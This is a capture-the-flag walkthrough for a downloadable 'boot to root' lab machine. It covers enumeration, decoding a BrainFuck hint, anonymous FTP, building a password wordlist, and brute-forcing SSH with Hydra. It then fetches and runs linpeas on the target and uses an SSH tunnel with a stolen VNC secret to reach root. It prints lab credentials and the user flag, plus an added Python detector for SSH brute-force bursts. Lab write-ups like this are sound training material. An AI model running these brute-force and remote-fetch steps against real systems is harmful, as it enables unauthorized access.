Target Machine IP Address: My Machine IP Address:
Boot to Root
- To get user flag
- To get root flag
- To get root access
Level: Easy/Medium
If you know how to do SSH tunneling and know what 'BrainFuck' is, I think you are good to go.
You can download the machine from here.
Information Gathering & Scanning Process:
IP: (which is printed by the machine, so we do not need to search for it)
Since I know the machine's IP address, I went ahead and did some manual assessment while running the following command (which helps to collect pretty much everything I needed to know about this machine)
All of the sub-directories in that list were bogus, but at the bottom I noticed some strange characters.

Initially I thought it was some kind of encrypted code, but later I came to understand it is another programming language called ‘BrainFuck’.
I used this link to convert the string.
Value we got: /alfa-support
Password Pattern: pet followed by 3 numerical digits.
<----- Let's keep all the above steps within stage 1. ----->
<----- Stage 2 Begins ----->
cat _full_tcp_nmap.txt | less
ftp
username: anonymous
password: anonymous
ls
cd thomas
get milo.jpg
exiftool milo.jpg (didn't find anything useful)
From stage 1, we can conclude that the pet’s name is milo.
Password pattern is milo$i$j$k ($i$j$k represents three digits)
Let’s write a script to prepare a list of password.
vim script.sh
#!/usr/bin/bash
# Generate milo000 .. milo999, one candidate per line
for i in {0..9}; do
  for j in {0..9}; do
    for k in {0..9}; do
      echo "milo$i$j$k" >> password.txt
    done
  done
done
chmod +x script.sh
./script.sh
I tried a python script for the task 🙂
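#!/usr/bin/python3
# Write every candidate "milo" + three digits to password.txt.
# range(10) covers the digits 0-9, matching the bash loop above.
with open('password.txt', 'w') as f:
    for i in range(10):
        for j in range(10):
            for k in range(10):
                print("milo" + str(i) + str(j) + str(k), file=f)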
Brute Force SSH using Hydra
hydra -l thomas -P password.txt -s 65111 ssh://
username: thomas password: milo666
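From the defender's side, a run like the one above leaves a clear trace in the sshd log: a burst of failed passwords for one user from one source, then a successful login. The following is an added example, not part of the original walkthrough; the log lines are constructed in OpenSSH's usual syslog format, and the host name, the user alice, the IP addresses, the threshold and the window are all assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines (not from the walkthrough); IPs are documentation ranges.
SAMPLE_LOG = "\n".join(
    [f"Mar 10 10:00:{s:02d} box sshd[801]: Failed password for thomas from 192.0.2.10 port {40000+s} ssh2"
     for s in range(1, 9)]
    + ["Mar 10 10:00:09 box sshd[801]: Accepted password for thomas from 192.0.2.10 port 40009 ssh2",
       "Mar 10 10:05:00 box sshd[902]: Failed password for alice from 198.51.100.7 port 51000 ssh2",
       "Mar 10 10:05:20 box sshd[902]: Accepted password for alice from 198.51.100.7 port 51001 ssh2"])

LINE = re.compile(
    r"^(\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+")

def detect(log, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return (bursts, compromised): (ip, user) pairs with >= threshold failures
    inside the window, and pairs where a login succeeded after such a burst."""
    recent = defaultdict(deque)   # (ip, user) -> timestamps of recent failures
    bursts, compromised = set(), set()
    for line in log.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year, so one is supplied (assumed) for parsing
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        outcome, user, ip = m.group(2), m.group(3), m.group(4)
        q = recent[(ip, user)]
        if outcome == "Failed":
            q.append(ts)
            while q and ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                bursts.add((ip, user))
        elif (ip, user) in bursts:            # success right after a burst: likely guessed
            compromised.add((ip, user))
    return bursts, compromised

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

A single mistyped password followed by a login (alice in the sample) is not flagged; only the burst followed by a success is.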
cat _full_tcp_nmap.txt | less
ssh thomas@ -p 65111

user_flag==>> M4Mh5FX8EGGGSV6CseRuyyskG (Solution 1)
scp -P 65111 thomas@ . #Saved Remote File (Keep in mind)
I tried to perform file, strings, cat, binwalk etc., no use lol
I tried to evaluate the target machine with the help of the linpea.sh program
Miscellaneous Steps :
On Kali Machine:
cd /path-to-linpea.sh/
python3 -m http.server
On Target or Victim Machine:
cd /tmp
wget
chmod +x linpea.sh
sh linpea.sh

Port 5901
We have the password from the above information. Do you remember the file .remote_secret?
vncviewer -passwd .remote_secret
I think I need to port forward or bind (like SSH tunneling). Let’s do some googling.
ssh -p 65111 -L 5901:localhost:5901 thomas@
vncviewer -passwd .remote_secret localhost:5901
Voilà!! We got the root flag as well as root access 🙂